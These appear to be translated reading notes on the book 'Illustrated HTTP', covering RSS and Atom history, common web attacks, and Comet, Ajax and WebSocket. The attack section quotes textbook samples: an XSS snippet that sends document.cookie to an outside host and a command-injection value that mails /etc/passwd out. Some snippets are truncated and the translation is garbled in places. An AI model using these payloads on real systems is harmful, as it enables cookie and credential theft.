5. “Illustrated HTTP” – RSS and Network Attacks


tjhttp 5. “Illustrated HTTP” – RSS and Network Attacks

This section is about the discussion of RSS and common network attacks. RSS seems to always be considered as “why it hasn’t disappeared”, but after personal understanding and experience, I found that it is surprisingly useful.

The part about network attacks sometimes becomes the test point of the interview. It is necessary to understand the basic network attack methods and common prevention methods.

knowledge points

  1. Introduction to the history of RSS, the meaning and value of RSS, personally think it is very suitable for people who learn independently.
  2. Introduction to WEB attack methods, understand the basic and common attack methods, these attack methods are not far from our daily life.
  3. Regarding bottlenecks and future development, some “outdated” content due to the timeliness of writing books can be skipped.

5.1 RSS

5.1.1 RSS History

Most of the following content comes from Wikipedia. Since most of it is theoretical content, I will not explain too much.

RSS (Simple Syndication) and Atom are collective names for news and blog log information file formats.

RSS(English full name:RDFSite Summary or Really Simple Syndication) in Chinese is translated as simple information aggregation, also known as aggregation content, which is a format specification for news sources, which is used to aggregate the updated content of multiple websites and automatically notify website subscribers.

After using RSS, website subscribers no longer need to manually check whether the website has new content. At the same time, RSS can integrate the updated content of multiple websites and present it in the form of a summary, which helps subscribers quickly obtain important information and choose Check it out carefully.

The historical version of RSS is updated as follows:

  • RSS 0.9 (RDF Site Summary): The original RSS version. In March 1999, it was developed by Netscape Communications Corporation for its portal website. The basic schema was built on the initial RDF specification.
  • RSS 0.91 (Rich Site Summary): Expanded elements on the basis of RSS0.9, developed in July 1999. Non-RDF specification, written in XML.
  • RSS 1.0 (RDF Site Summary): The RSS specification is in a state of confusion. Released in December 2000 by the RSS-DEV working group again using the RDF specification used in RSS0.9.
  • RSS2.0 (Really Simple Syndication): non-RSS1.0 development route. Add support for RSS0.91 compatibility, which was developed by UserLand Software in December 2000.

Up to now, RSS has several different versions, which are divided into twomain branch (RDF and 2.X)

RDF (or RSS 1.X) forks include the following versions:

  • RSS 0.90 is the original Netscape RSS release. This RSS is called _RDF Site Summary_, but is based on an early working draft of the RDF standard and is not compatible with the final RDF proposal.
  • RSS 1.0 is an open format from the RSS-DEV working group, again standing for _RDF Site Summary_. RSS 1.0 is an RDF format like RSS 0.90, but not fully compatible with it, because 1.0 is based on the final RDF 1.0 Recommendation.
  • RSS 1.1 is also an open format intended to update and replace RSS 1.0. This specification is an independent draft and is not endorsed or endorsed by the RSS-Dev Working Group or any other organization.

The RSS 2.X branch (originally UserLand, now Harvard) includes the following versions:

  • RSS 0.91 is the simplified version of RSS released by Netscape and the version number of the simplified version originally advocated by Dave Winer of Userland Software. The Netscape version is now called _Rich Site Summary_; this is no longer RDF, but relatively easy to use.
  • RSS 0.92 through 0.94 are extensions of the RSS 0.91 format and are mostly compatible with each other and with Winer’s version of RSS 0.91, but not with RSS 0.90.
  • The build number for RSS 2.0.1 is 2.0. RSS 2.0.1 was declared “frozen”, but was still updated shortly after its release, without changing the version number. RSS now stands for _Really Simple Syndication_. The major change in this release is an explicit extension mechanism using XML namespaces.

5.1.2 Atom

For the same things that I haven’t touched much, the contents of the encyclopedia are organized as follows.

Atomis a pair of criteria related to each other. Atom Syndication Format (Atom Syndication Format) is used forwebsite sourcebased onXMLdocument format; and Atom Publishing Protocol (Atom Publishing Protocol, referred to as AtomPub or APP) is used to add and modify network resources,based onHTTPagreement

it borrows from various versionsRSSThe use experience is widely used by many aggregation tools in publishing and using. The Atom feed format is designed as a replacement for RSS; while the Atom publishing protocol is used to replace various existing publishing methods (such as Blogger API and LiveJournal XML-RPC Client/Server Protocol).GoogleSeveral services provided are using Atom. Google Data API (GData) is also based on Atom.

RSS andAtom) are widely supported and compatible with all major consumer feed readers. RSS gained wider adoption thanks to early feed reader support.

Technically, Atom has several advantages:less restrictive license,IANARegisteredMIME type, the XML namespace,URIsupport,RELAX NG**support.

Atom has the following two standards.

Atom Syndication Format (Atom Syndication Format): The website news source format formulated for publishing content. When talking about Atom alone, it refers to this standard.

Atom Publishing Protocol: A protocol for adding or modifying content on the Web.

For more content, you can refer to these two websites:

The Atom Syndication Format:


Atom Syndication Format(IBM)


5.1.3 Meaning of RSS

In most cases, RSS is used to subscribe to online blog applications and obtain synchronous updates of your favorite website information. Personally, I think it is similar to a different form of WeChat official account. However, in recent years, WeChat has also changed its algorithm, and the push has also changed from the previous one. Push, until now push according to the user’s preferences.

Does RSS still make sense now? Why are people still using it? I personally think that the greatest significance of RSS subscription isfilter noise, the reading of RSS feeds needs to rely on the reader, please refer to the “References” for the content of this part of the software.

RSS has several significant advantages:

  1. From passive acquisition of information to active acquisition of information.
  2. Avoid the algorithms of various Internet companies.
  3. Block out the noise of the internet.
  4. Back to basics, not all “regression of the times” is wrong.

These points basically determine that many platforms will not like this thing, because it blocks the way of making money.

Of course RSS has its disadvantages, the biggest disadvantage istoo small,So it is not surprising that it will disappear one day. Since there is almost no profit to be made, it is relatively rare that the current competition is actually a few forces that make standards.

In fact, there are quite a few people still using RSS.

5.2 WEB attack

In order to realize its simplicity and efficiency, HTTP maintains the stateless feature in HTTP1. This kind of thing happens all the time.

Attack methods are mainly divided into active attack and passive attack.

The passive attack method is mainly to use phishing websites or links to guide users to click, and then run the attack code to obtain the personal information of the user’s computer, etc. The active attack is similar to DDos traffic impact.

In most cases, there are more passive attacks, because there is almost no labor cost, and active attacks are basically websites with considerable traffic value, which are often subject to similar attacks.

The following is a list of common WEB attack methods based on the contents of the book.

5.2.1 XSS attack

The first is the more common XSS attack (cross-site scripting attack), which mainly completes the attack through illegal HTML tags or JS scripts. By pre-setting website traps, users may be caught when filling in personal sensitive information.

http://example.jp/login?ID="> <script>var+f=document.getElementById("login"); +f.action="h </script><span+s=" HTML source code corresponding to request (excerpt)

In addition to obtaining login information, there is another way to obtain the user’s personal information directly by grabbing the content of the cookie through a JS script, such as using code like the following:

var content = escape(document.cookie); 
document.write("<img src=http://hackr.jp/?"); 

5.2.2 SQL Injection

SQL injection mainly occurs when programming developers do not treat SQL rigorously and leave loopholes, resulting in SQL injection attacks.

For example, it is mentioned in the book that by injecting single quotation marks into SQL parameters, the subsequent SQL content will become invalid to obtain some inaccessible information.

The solution is also relatively simple. You need to be careful or avoid using placeholders. Instead, use special symbols such as “?” to replace parameters instead of directly embedding SQL.

SQL obviously uses the rules of SQL grammar to complete the injection of this special character. Of course, most of the cases are caused by the impreciseness of website programmers.

If you think that this kind of thing rarely happens now, you are very wrong. There are still a large number of websites in China that do not even prevent the most basic SQL injection problems.

5.2.3 OS attack

OS attacks are not uncommon. Mining scripts are common in cloud servers in recent years. The viruses brought by open source components are annoying and disgusting.

For specific cases of OS attacks, see the following method to find out the vulnerabilities of the OS by obtaining user emails, and quickly steal email accounts and passwords through commands such as pipe characters to achieve the purpose of hacking.

my $adr = $q->param('mailaddress');

open(MAIL, "| /usr/sbin/sendmail $adr"); 

print MAIL "From: [email protected]\n";

The attacker specifies the following value as the email address.

; cat /etc/passwd | mail [email protected]

The program receives this value and forms the following command combination.

| /usr/sbin/sendmail ; cat /etc/passwd | mail [[email protected]](mailto:[email protected])

5.2.4 DDos attack

A very direct and brutal attack method knocks down the target server through large-scale traffic, making the target server paralyzed and inaccessible. so also calleddenial of service attackandservice stop attack

There are two main types of DDos attacks:

  • Centralized access to resource overload is actually the implantation of meaningless programs that require a lot of calculations to exhaust computer resources.
  • Attacking a system vulnerability causes the service to stop. Usually this vulnerability comes from a vulnerability in open source code. For example, the notorious FastJson’s frequent leaks need to be fixed.

For attackers, the cost of DDos is very low, because foreign countries can complete this operation by purchasing a large number of broiler servers, but for an independent website visited by online customers, there are actually not many protection solutions, most of the time only “Burning money” to solve the problem, because the source of the attack cannot be discerned.

5.2.5 Directory Traversal Attack

Directory attack is the act of obtaining user passwords by accessing paths that are sensitive to certain permissions, such as trying to obtain user passwords through scripts./etc/passwdrelated information.

5.2.6 Cross Site Request Forgery

that is often saidCSRF attack, also uses traps to induce user operations, and completes some “out-of-bounds” operations through the user’s identity after obtaining user information.

5.2.7 Session Attack

Session attack, for the session information of many websites stores information related to user login, speculates or obtains user ID information through various means, and then forges user identity to complete the login operation based on this information.

The above attack is session hijacking, which obtains information by setting traps or violence. The other is to use the user login operation to use the same user ID to wait for the user to complete the operation and get the current session information access. Entering the door behind others will not be discovered, and waiting to enter will only guard until the owner leaves before going in to steal things.

For such information protection, simple processing can add IP verification rules during authentication. If the same identity information is sent from different IPs, it can be considered as a kind of session content theft.

5.2.8 Clickjacking

Using the characteristics of network iframe and transparent elements, the clicked button is overlaid on the original page, and relevant information will also be brought over at this time.

5.2.9 Password cracking

The means of password cracking are usuallyExhaustive methodanddictionary attack, the brute force method usually takes advantage of the situation that users like to use information related to birthdays or names as passwords, and conducts forced cracking through trial and error, and brute force cracking by formulating rules. Of course, the premise of exhaustive cracking is that the length of the secret key is small enough , there is another way to crack the encrypted ciphertext, and also use the method of querying the dictionary for trial and error.

Common encryption cracking methods are as follows:

  • Analogy through brute force method and dictionary attack: it is the so-called combination of brute force method and dictionary attack method through hash function, which is suitable for systems encrypted with general encryption functions.
  • Rainbow Table: Rainbow Table (Rainbow Table) is a database table composed of plaintext passwords and corresponding hash values. It is called a rainbow table because it contains ciphertext encrypted by various encryption functions like “rainbow” Similarly, the purpose is to reduce the time overhead of exhaustive and dictionary methods.
    The rainbow table is a more effective means of cracking.

Now I am athttps://freerainbowtables.com/A rainbow table composed of MD5 hash values ​​corresponding to 1-8 digit strings of uppercase and lowercase letters and numbers published on this website

  • Get the key: Obtain the user’s public key through network hijacking and other means and request the target server by forging the key, and finally realize the cracking method of deceiving the server to obtain the ciphertext.
  • Vulnerabilities in the encryption algorithm: Finding the loopholes in the algorithm is basically difficult to find loopholes in the current mainstream information encryption algorithms, so it is a method with a very, very low success rate.

The way to prevent password cracking is to check the number of password errors and limit frequent requests in a short period of time. For encrypted data, a content called “salt value” will be added to the original password ciphertext.

5.2.10 Backdoor

The backdoor program sets an entry point when a loophole is discovered rather than a direct attack. Through the backdoor program to play tricks on the loopholes, it is possible to complete information theft without any perceived problems in daily access. Because it is very difficult to find, the backdoor program is a highly dangerous WEB attack method for the system.

  • In the development stage, it is used as a backdoor program invoked by Debug.
  • A backdoor program inserted by developers for their own benefit.
  • A backdoor program set by an attacker in a certain way.

Here is a brief talk about the second type. There are many actual cases, such as the case where a simple and rude payment website randomly replaces the payment code through a backdoor program.

There is also a background program similar to “Wool”, which charges a “handling fee” of “0.00*N1” for each order. If such a background program is not sharp-eyed, it is basically difficult to find. At the same time, although the number is small, the number of users In very large cases, this income is actually a huge sum of money.

These things are high voltage lines, don’t try it!

5.3 Bottlenecks and “future” developments

At present, we are now reading that the future mentioned in this book has been realized, and these contents can be simply read.

  • SPDY (HTTP2.0)
  • Ajax
  • WebSocket
  • Comet
  • HTTP long connection

5.3.1 SPDY – The Chromium Projects

This part of the content is explained in detail in the history of HTTP2.0 in [[“Illustrated HTTP” – HTTP Protocol Historical Development (Key Points)]], and will not be repeated here.

5.3.2 Ajax

The core technology of Ajax is an API called XMLHttpRequest, which can communicate with the server through HTTP through the call of JavaScript scripting language, and use Ajax to complete the operation of partial update of WEB pages.

5.3.3 Comet

The original meaning of this word is called “comet”. Before WebSocket technology completely solves the browser compatibility problem, there is a wide range of application requirements for “server push” (Comet technology), which drives the development of technology.CometTechnology is almost indispensable in the instant messaging solution on the web.

Prior to this technique:

existCometThere was an earlier reverse content push implemented by server push, which was gradually abandoned by the timesFlash, but usingFlashThe premise is that the user voluntarily installs it.FlashJS calls can be easily completed and providedXMLSocketThe class interface implements reverse push, so for a long time it was the only way to push on the server side.

Another technology is the long-dead Java Applet, which completes the socket connection and server push through java.net.Socket or java.net.DatagramSocket or java.net.MulticastSocket, but it has a fatal flaw that the Applet cannot Combined with JavaScript to complete the dynamic refresh of the real-time page.

CometHow did it develop?

real timeCometIt also relies on the popularity and expansion of Ajax, so Comet is defined as “Comet” based on the “server push” technology based on HTTP long connection and no need to install plug-ins on the browser side.

CometMethod to realize?

There are two ways to implement Commet, the first isAJAX-based long-polling (long-polling) method, the second isStreaming method based on Iframe and htmlfile

First, briefly describe the first method. The long polling method needs to continuously establish an HTTP handshake connection with the server, and each connection will waste a lot of unnecessary network overhead.

The second is to use iframe nesting and the streaming method of html file. Although the iframe tag has long been discouraged (and abandoned) by HTML, it was once one of the few options for implementing long links. Play an important role.

The principle is very simple, that is, the URL for obtaining data is nested in the Src tag of the iframe. Instead of returning the page in the Iframe, it returns the JS code called by the client, and the client executes the code after receiving the JS transfer returned by the server.

But obviously iframe does not allow this kind of nested JS code call in many browsers, so Google subsequently proposed to use ActiveX, which is actuallyEncapsulates a JavaScript comet object based on iframe and html file

But because the old version of IE is incompatible with Google and FIreFox, this thing used to be extremely disgusting in the past (in terms of IE compatibility), and it required some template code optimization and processing on the front end, which was troublesome.

The way to use Comet is to return a response immediately once an update is found on the server. Use delayed response to simulate the push function. Comet will put the response in the pending state when receiving the request, and then return the response when there is content update on the server side.

Related open source components

  • Pushlet: Open source Comet framework, using the observer model
  • IComet: a comet/push server developed in C++ language that supports millions of concurrent connections

CometIt is a transitional “plug-in” to solve the problem of server push in the past. Although it has solved the problem to a certain extent, it belongs to encircling Wei and saving Zhao. In essence, the point of sending requests by the client has not changed fundamentally.

soCometYou don’t need to spend too much effort, more details can be found in the “References section”.

5.3.4 HTTP persistent connection features

Apart fromCometIn addition to many limitations of its own, HTTP long connection itself also has some noteworthy features.

  1. There are restrictions on HTTP1.1 long connections, that is, the client should not establish more than two HTTP connections with the server, and in IE, the download of more than two files is blocked.
  2. Server-side performance and scalability, if Ajax has frequent requests, Comet will occupy a connection for a long time,Java.io provided in JAVA1.4Although it is possible to return thread resources to the thread pool when the connection is idle, there are still some problems in dealing with frequent Ajax requests, making fewer idle connections and affecting performance. For this reason, Jetty has some optimizations for Comet, which have been introduced in detail in the related article “AJAX, Comet and Jetty” (but unfortunately this article can no longer be found).
  3. Separation of control information and data display, HTTP long-term connection closing needs to rely on the client to send a close request, but many times the client will close the webpage by itself, and the server needs to change the blocking waiting for the client request to close. In order to solve this problem, a close request will be sent asynchronously in the implementation of AJAX. The iframe-based approach requires two Iframes, one for display and the other for exchanging control information, so that control requests can respond quickly without being blocked by display information.
  4. Maintain heartbeat. The so-called maintenance heartbeat means that the server needs a check mechanism to check whether the client is active. It regularly checks whether the client closes the connection. If the connection is closed, it will enter the link of blocking reading. If the client is closed, it will enter abnormal state and close the connection to release resources.

    Note that if the AJAX-based long polling method needs to be usedtimerIn this way, when the client does not send a request for a long time through the timer, it will consider that the client has closed itself and also release resources to ensure the effective use of server resources.

    Finally, if there is a problem with itself, it is also necessary to notify the client and release resources to prevent the overflow of vulnerabilities.

5.3.5 WebSocket

It was originally part of the HTML5 standard, but after it appeared, it gradually separated from HTML5 and became an independent protocol. Modern mainstream browsers are basically compatible with WebSocket (except IE).

On December 11, 2011, the WebSocket communication protocol was adopted byRFC 6455 - The WebSocket Protocol set as standard.

WebSocket solves the pain point of Comet and Ajax. Once the communication connection of WebSocket protocol is established between the Web server and the client, all subsequent communications rely on this dedicated protocol, which means that similar protocols are “upgraded” because no client is required. Actively obtain data, and the server can directly push data to the client after establishing a connection.

Design purpose: The original purpose is to solve the defects caused by Ajax and Conmet’s XmlHttpRequest. The fundamental flaw of these two components is thatThe request can only be sent by the client

Of course, it does not mean that real-time content updates cannot be completed only by using client requests. One way is to use polling to obtain information, but polling means continuous connection with server requests, and there is also a compatible component “Comet” as a transition.

About WebSocket has the following characteristics:

(1) Based on the TCP protocol, it is compatible up and down.

(2) It has good compatibility with HTTP protocol. The default ports are also 80 and 443, and the handshake phase uses the HTTP protocol, so it is not easy to shield during the handshake, and HTTP can be used for proxying.

(3) Lightweight response format, efficient.

(4) Text or binary data can be sent.

(5) There is no same-origin restriction, and the client can communicate with any server.

(6) The protocol identifier isws(if encrypted, orwss), the server URL is the URL.

(7) Reduce communication traffic, because once a connection is established, it will remain connected, so the overhead of the HTTP header will also be reduced.


// Create WebSocket connection.
const socket = new WebSocket('ws://localhost:8080');

// Connection opened
socket.addEventListener('open', function (event) {
    socket.send('Hello Server!');

// Listen for messages
socket.addEventListener('message', function (event) {
    console.log('Message from server ', event.data);

The basic steps are as follows:

  1. Handshake request. After the HTTP connection is established, use the HTTP Upgrade header field to notify the server that the communication protocol has changed. You can see that after making the HTTP connection, initiate an “upgrade protocol” request again.
GET /chat HTTP/1.1
Host: server.example.com
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Origin: http://example.com
Sec-WebSocket-Protocol: chat, superchat
Sec-WebSocket-Version: 13

Remarks: The Sec-WebSocket-Key field records the essential key values ​​in the handshake process. The used sub-protocol is recorded in the Sec-WebSocket-Protocol field.

  1. Because there may be data interaction in the initial HTTP connection, the status code is returned for the previous request101 Switching Protocolsthe response to.

If you don’t know what 101 is, it doesn’t matter. Take a look at [[“Illustrated HTTP”-Status Code]] this chapter and you will find that it is actually a prompt message that has no effect. The following explanation can be translated by yourself, which will help deepen your impression.


The pictures of WebSocket in the book are good, and you can basically intuitively feel how the separate protocol of WebSocket cooperates with HTTP.


There are many details about WebSocket that can be expanded. Since this book is aimed at the most basic beginners, this reading note will not explain too much. Here I also found some information on the Internet as an extension. For details, please read the “References” section .

web history

The history of WEB tells about HTML+CSS+JAVASCRIPT and DOM, and also introduces the Servlet that is no longer used. Among these technologies, Servlet needs to be mentioned. This technology that seems to have nothing to do with the current WEB is actually still active, but In another form, it was packaged by Spring and disappeared, so if you want to learn the Web well, it is essential to master Servlet thoroughly.